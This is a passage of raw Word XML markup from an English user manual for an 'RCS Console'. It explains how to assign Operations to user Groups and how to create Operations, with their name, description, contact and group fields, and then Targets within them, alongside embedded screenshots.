                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00064569" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Operations in this Group</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00064569" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">allow you to select the </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00064569" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">perations that you want to associate with this </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>roup.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004507DB" w:rsidRDefault="004507DB" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002175DC" w:rsidRDefault="002175DC" w:rsidP="00794182">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004507DB" w:rsidRPr="0098176A" w:rsidRDefault="00AD393A" w:rsidP="00AD393A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.5</w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="002175DC" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="002175DC" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] Accounting &gt; </w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Groups</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1030" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:237pt;height:102.75pt;z-index:251669504;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId33" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1030" DrawAspect="Content" ObjectID="_1446455340" r:id="rId34"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004507DB" w:rsidRDefault="004507DB" w:rsidP="0087756C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF27CF" w:rsidRDefault="00AF27CF" w:rsidP="0087756C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AF27CF" w:rsidSect="00CE07E2">
          <w:headerReference w:type="default" r:id="rId35"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRDefault="0087756C" w:rsidP="00A719CD">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc372642481"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Operations and Target</w:t>
      </w:r>
      <w:r w:rsidR="00D618FA">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRDefault="0087756C" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF27CF" w:rsidRDefault="00794182" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">After </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sers and </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">roups creation it’s possible to proceed with </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">perations and </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>argets management.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF27CF" w:rsidRDefault="00794182" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00794182">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00794182">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">peration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidRPr="00794182">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">an investigation in which only one or more </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="00794182">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">roups of </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="00794182">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sers are allowed to investigate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00794182" w:rsidRDefault="00794182" w:rsidP="00AF27CF">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AF27CF" w:rsidTr="00051467">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4957" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00051467" w:rsidRDefault="00051467" w:rsidP="00794182">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AF27CF" w:rsidRPr="0059626D" w:rsidRDefault="0010013A" w:rsidP="00AD393A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="00AD393A">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Operations</w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&gt; New Operation</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1078" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:237pt;height:219.75pt;z-index:251708416;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId36" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1078" DrawAspect="Content" ObjectID="_1446455341" r:id="rId37"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AF27CF" w:rsidRDefault="00AF27CF" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AF27CF" w:rsidRPr="00240B6F" w:rsidRDefault="00AF27CF" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AF27CF" w:rsidRPr="00240B6F" w:rsidRDefault="00AF27CF" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AF27CF" w:rsidRPr="00240B6F" w:rsidRDefault="00AF27CF" w:rsidP="00134262">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w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00794182" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration</w:t>
            </w:r>
            <w:r w:rsidR="00674013" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">’s </w:t>
            </w:r>
            <w:r w:rsidR="00794182" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>name</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00794182" w:rsidRPr="00240B6F" w:rsidRDefault="00794182" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a not mandatory field </w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to be used for storing additional information</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> about the </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00794182" w:rsidRPr="00240B6F" w:rsidRDefault="00794182" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Contact</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00002CBA" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is a not mandatory field </w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">to be used for storing </w:t>
            </w:r>
            <w:r w:rsidR="00002CBA" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>n Operation’s reference</w:t>
            </w:r>
            <w:r w:rsidR="00002CBA" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00794182" w:rsidRPr="00240B6F" w:rsidRDefault="00002CBA" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Groups</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] must be filled with at least one </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>roup from those available.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00360DA4" w:rsidRPr="00C93347" w:rsidRDefault="00360DA4" w:rsidP="00AD393A">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ee page</w:t>
            </w:r>
            <w:r w:rsidR="00AD393A">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 13 </w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AF27CF" w:rsidRDefault="00AF27CF" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF27CF" w:rsidRDefault="00AF27CF" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF27CF" w:rsidRDefault="00674013" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Simply </w:t>
      </w:r>
      <w:r w:rsidR="008C26E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">accessing an </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="008C26E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">peration (double-click) you can begin creating </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="008C26E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>argets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF27CF" w:rsidRDefault="00AF27CF" w:rsidP="00134262">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794182" w:rsidTr="00051467">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4957" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00051467" w:rsidRDefault="00051467" w:rsidP="008C7FB1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AF27CF" w:rsidRPr="0059626D" w:rsidRDefault="0010013A" w:rsidP="00AD393A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="00AD393A">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Operations</w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
